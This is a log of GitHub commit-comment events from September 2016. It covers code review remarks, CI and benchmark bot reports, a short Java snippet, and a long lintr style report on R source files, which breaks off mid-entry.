{"id":"4600717700","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19125636,"position":null,"line":null,"path":null,"commit_id":"413ed79ec54f3a754ac8bc57c1d29835d17bd274","created_at":"2016-09-22T06:56:27Z","updated_at":"2016-09-22T06:56:27Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/413ed79ec54f3a754ac8bc57c1d29835d17bd274#commitcomment-19124544) has completed - no performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/4a3f16d0bf4c2ce1fa3dff7355f865d8bc8238e6/daily_2016_9_22/report.md). cc @jrevels"}},"created_at":"2016-09-22T06:56:27Z"}
{"id":"4600717990","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"jamestalmage/cli-table2"},"payload":{"comment":{"id":19125638,"position":39,"line":158,"path":"src/utils.js","commit_id":"6f53cbfb724af921e5ac9b1b763addd86dc6e34d","created_at":"2016-09-22T06:56:33Z","updated_at":"2016-09-22T06:56:33Z","body":"@jamestalmage Would you be interested in using [`cli-truncate`](https://github.com/sindresorhus/cli-truncate) here?"}},"created_at":"2016-09-22T06:56:33Z"}
{"id":"4600723425","type":"CommitCommentEvent","actor":{"login":"syshin-fasoo"},"repo":{"name":"syshin-fasoo/hello-world"},"payload":{"comment":{"id":19125651,"position":null,"line":null,"path":null,"commit_id":"2ccae5e60bdce6f865385b63634dfd8e3f5d4905","created_at":"2016-09-22T06:58:18Z","updated_at":"2016-09-22T06:58:18Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TgcG0Gfh&#x2F;1-file-lock\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [보안강화] File lock</a>"}},"created_at":"2016-09-22T06:58:18Z"}
{"id":"4600724930","type":"CommitCommentEvent","actor":{"login":"jodosha"},"repo":{"name":"hanami/model"},"payload":{"comment":{"id":19125654,"position":27,"line":27,"path":"lib/hanami/model/sql/consoles/abstract.rb","commit_id":"cc3067b89c491953e8e10101b27d283b3efdb3cb","created_at":"2016-09-22T06:58:46Z","updated_at":"2016-09-22T06:58:46Z","body":"You're right! Removed here: cb61437 Thanks!"}},"created_at":"2016-09-22T06:58:46Z"}
{"id":"4600725919","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125656,"position":90,"line":90,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeClassifier.java","commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T06:59:04Z","updated_at":"2016-09-22T06:59:04Z","body":"Can we add @Nullable to the fields which can be nullable"}},"created_at":"2016-09-22T06:59:04Z"}
{"id":"4600728261","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125662,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T06:59:48Z","updated_at":"2016-09-22T06:59:48Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-22T06:59:48Z"}
{"id":"4600730045","type":"CommitCommentEvent","actor":{"login":"filnet"},"repo":{"name":"openscenegraph/OpenSceneGraph"},"payload":{"comment":{"id":19125667,"position":28,"line":1050,"path":"CMakeLists.txt","commit_id":"3b029f5d3e2e6348707a51b058c50c2a3519c68f","created_at":"2016-09-22T07:00:18Z","updated_at":"2016-09-22T07:00:18Z","body":"typo here : VERSIO vs VERSION"}},"created_at":"2016-09-22T07:00:18Z"}
{"id":"4600730605","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/MOHA-Kafka"},"payload":{"comment":{"id":19125668,"position":null,"line":null,"path":null,"commit_id":"c05e529e66c0556e943307a35203ab5970d8971f","created_at":"2016-09-22T07:00:27Z","updated_at":"2016-09-22T07:00:27Z","body":"I don't like your change"}},"created_at":"2016-09-22T07:00:27Z"}
{"id":"4600735343","type":"CommitCommentEvent","actor":{"login":"mengch"},"repo":{"name":"mengch/learn-vue"},"payload":{"comment":{"id":19125695,"position":8,"line":4,"path":"src/directives/directives.js","commit_id":"10fb918395e7b170ab5cdcd73ca8d26f33016563","created_at":"2016-09-22T07:01:52Z","updated_at":"2016-09-22T07:01:52Z","body":"object v-for works well."}},"created_at":"2016-09-22T07:01:52Z"}
{"id":"4600735676","type":"CommitCommentEvent","actor":{"login":"malthe"},"repo":{"name":"ponylang/ponyc"},"payload":{"comment":{"id":19125697,"position":5,"line":28,"path":"packages/assert/assert.pony","commit_id":"3544e46a03e1bc3f001115982661109759152bdc","created_at":"2016-09-22T07:01:58Z","updated_at":"2016-09-22T07:01:58Z","body":"AFAIK Pony's string operations always results in a null-terminated byte array internally. Does ``null_terminated`` make sense given this guarantee? Also, the docstring for ``cstring()`` explicitly promises to return a pointer to a null-terminated byte array."}},"created_at":"2016-09-22T07:01:58Z"}
{"id":"4600739519","type":"CommitCommentEvent","actor":{"login":"yaodianmi"},"repo":{"name":"sirkay777/DoubanBookApp"},"payload":{"comment":{"id":19125705,"position":7,"line":7,"path":"js/AboutScreen.js","commit_id":"e7483a58bb9fa0cbc5ef70f5d3559452ac664d6f","created_at":"2016-09-22T07:03:09Z","updated_at":"2016-09-22T07:03:09Z","body":"🆒"}},"created_at":"2016-09-22T07:03:09Z"}
{"id":"4600739598","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125706,"position":113,"line":113,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeClassifier.java","commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T07:03:11Z","updated_at":"2016-09-22T07:03:11Z","body":"Don't need this comment anymore.\r\nAlso can we throw exception if inputSchema is null since the features that need to be used will vary with varying schema which is not correct"}},"created_at":"2016-09-22T07:03:11Z"}
{"id":"4600740768","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125709,"position":56,"line":56,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeClassifier.java","commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T07:03:32Z","updated_at":"2016-09-22T07:03:32Z","body":"Please remove extra line"}},"created_at":"2016-09-22T07:03:32Z"}
{"id":"4600740848","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125710,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T07:03:34Z","updated_at":"2016-09-22T07:03:34Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T07:03:34Z"}
{"id":"4600741021","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125711,"position":59,"line":59,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeClassifier.java","commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T07:03:37Z","updated_at":"2016-09-22T07:03:37Z","body":"Please remove extra line"}},"created_at":"2016-09-22T07:03:37Z"}
{"id":"4600741506","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125712,"position":88,"line":88,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeClassifier.java","commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T07:03:47Z","updated_at":"2016-09-22T07:03:47Z","body":"Please remove extra line"}},"created_at":"2016-09-22T07:03:47Z"}
{"id":"4600742083","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19125714,"position":125,"line":125,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeClassifier.java","commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T07:03:57Z","updated_at":"2016-09-22T07:03:57Z","body":"Please remove extra line"}},"created_at":"2016-09-22T07:03:57Z"}
{"id":"4600743218","type":"CommitCommentEvent","actor":{"login":"fendrik"},"repo":{"name":"TIF-128bit/Teknologi-Kebencanaan"},"payload":{"comment":{"id":19125718,"position":null,"line":null,"path":null,"commit_id":"1a1e16d93e4197244480c43a69372ef5728f329f","created_at":"2016-09-22T07:04:19Z","updated_at":"2016-09-22T07:04:19Z","body":"Hardware-hardware yang digunakan"}},"created_at":"2016-09-22T07:04:19Z"}
{"id":"4600744024","type":"CommitCommentEvent","actor":{"login":"ducatoz"},"repo":{"name":"ducatoz/ducblog.github.io"},"payload":{"comment":{"id":19125719,"position":26,"line":26,"path":"Gruntfile.js","commit_id":"9bad2a72a9e92b358ebef48c0a57b94d700d24de","created_at":"2016-09-22T07:04:34Z","updated_at":"2016-09-22T07:04:34Z","body":"gfjgfgfjgggfjg  jgfjf"}},"created_at":"2016-09-22T07:04:34Z"}
{"id":"4600749858","type":"CommitCommentEvent","actor":{"login":"yaodianmi"},"repo":{"name":"sirkay777/DoubanBookApp"},"payload":{"comment":{"id":19125727,"position":59,"line":13,"path":"js/DoubanBookApp.js","commit_id":"4e9f934cd079b10eb7512889259782bd8ce747b2","created_at":"2016-09-22T07:06:24Z","updated_at":"2016-09-22T07:06:24Z","body":"学习了"}},"created_at":"2016-09-22T07:06:24Z"}
{"id":"4600750447","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"shminer/android_kernel_lge_g5"},"payload":{"comment":{"id":19125731,"position":null,"line":null,"path":null,"commit_id":"8b952a394f85f2720524743967108988cd54377f","created_at":"2016-09-22T07:06:36Z","updated_at":"2016-09-22T07:06:36Z","body":"Hi :) \r\nUsing these new libraries \"lib/lib64 libOmxVdec.so\" I don't need to cherrypick this commit, right?"}},"created_at":"2016-09-22T07:06:36Z"}
{"id":"4600754048","type":"CommitCommentEvent","actor":{"login":"Loki-Afro"},"repo":{"name":"andreasmihm/cucumber-java"},"payload":{"comment":{"id":19125752,"position":null,"line":null,"path":null,"commit_id":"87d6697b80d3dc1cce1c8632f7080a5917d86e53","created_at":"2016-09-22T07:07:44Z","updated_at":"2016-09-22T07:07:44Z","body":"DDdddns? kennst du? DNS :P"}},"created_at":"2016-09-22T07:07:44Z"}
{"id":"4600760769","type":"CommitCommentEvent","actor":{"login":"Bhanu19akhila"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19125769,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-22T07:09:29Z","updated_at":"2016-09-22T07:09:29Z","body":"import java.lang.;\r\nimport java.util.;\r\nimport java.io.*;\r\n\r\nclass Sol\r\n{\r\npublic static void main(String args[])\r\n{\r\nString s1,s2,s3;\r\nScanner sc=new Scanner(System.in);\r\nSystem.out.println(\"enter string and checking string\");\r\ns1=sc.nextLine();\r\ns2=sc.nextLine();\r\nif(s1.contains(s2))\r\n{\r\ns3=s1.replace(s2,\"\");\r\nSystem.out.println(s3);\r\n}\r\nelse\r\n{\r\nSystem.out.println(s1);\r\n}\r\n}\r\n}"}},"created_at":"2016-09-22T07:09:29Z"}
{"id":"4600761636","type":"CommitCommentEvent","actor":{"login":"sonovice"},"repo":{"name":"sonovice/verovio"},"payload":{"comment":{"id":19125771,"position":null,"line":null,"path":null,"commit_id":"46e52c482c5ab492247b5021ac512aa842c3c10b","created_at":"2016-09-22T07:09:46Z","updated_at":"2016-09-22T07:09:46Z","body":"Sure, should be possible. I will look into it after I have cleaned up this git mess..."}},"created_at":"2016-09-22T07:09:46Z"}
{"id":"4600762543","type":"CommitCommentEvent","actor":{"login":"YoungHoi"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19125772,"position":null,"line":null,"path":null,"commit_id":"e2eadd47a2bef140045c93595ac9512ac162e4ec","created_at":"2016-09-22T07:10:01Z","updated_at":"2016-09-22T07:10:01Z","body":"알려드립니다. 수정함."}},"created_at":"2016-09-22T07:10:01Z"}
{"id":"4600763567","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19125775,"position":null,"line":null,"path":null,"commit_id":"cad209ee7c1c566cc62e88c6f4b5732dea6d73f9","created_at":"2016-09-22T07:10:17Z","updated_at":"2016-09-22T07:10:17Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:4:20:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L4) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  results <- matrix( 0, nrow = s, ncol = 1)\n                   ^\n```\n[R/calcSumKDA2.R:7:28:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes <- KDA[numbers+1] + (log(I[i]) * numbers)  -\n                          ~^~\n```\n[R/calcSumKDA2.R:8:7:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n      ^\n```\n[R/calcSumKDA2.R:8:15:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n              ^\n```\n[R/calcSumKDA2.R:8:32:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                               ^\n```\n[R/calcSumKDA2.R:8:50:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                 ^\n```\n[R/calcSumKDA2.R:8:52:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                   ^\n```\n[R/calcSumKDA2.R:10:19:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                  ^\n```\n[R/calcSumKDA2.R:10:29:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                            ^\n```\n[R/calcSumKDA2.R:11:19:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                  ^\n```\n[R/calcSumKDA2.R:11:44:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/calcSumKDA2.R#L11) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    sumlist <- sum( exp(outcomes - log_max) )\n                                           ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt])\n           ^\n```\n[R/Condition.R:15:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt])\n                ^\n```\n[R/Condition.R:16:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​    poch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt])\n                ^\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:36:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                  ~^~\n```\n[R/Condition.R:21:51:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h <- poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                                 ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n               ^\n```\n[R/Condition.R:23:47:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                              ^\n```\n[R/Condition.R:23:51:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2) ) - \n                                                  ^\n```\n[R/Condition.R:24:53:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L24) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (lgamma(theta_x / 2) + lgamma(theta_y / 2) )\n                                                    ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:42:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/Condition.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:3:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n    ^\n```\n[R/Condition.R:35:39:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L35) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:37:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { \n    ^\n```\n[R/Condition.R:37:6:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { \n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:37:28:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L37) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { \n                           ^\n```\n[R/Condition.R:37:29:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(incorrectLength == 1) { \n                            ^\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals, g)\n^\n```\n[R/Condition.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:47:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L50) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:51:5:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:55:18:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:55:19:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:56:13:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:56:14:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:56:16:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:56:17:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:58:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:60:1:](https://github.com/thijsjanzen/GUILDS/blob/cad209ee7c1c566cc62e88c6f4b5732dea6d73f9/R/Condition.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​ 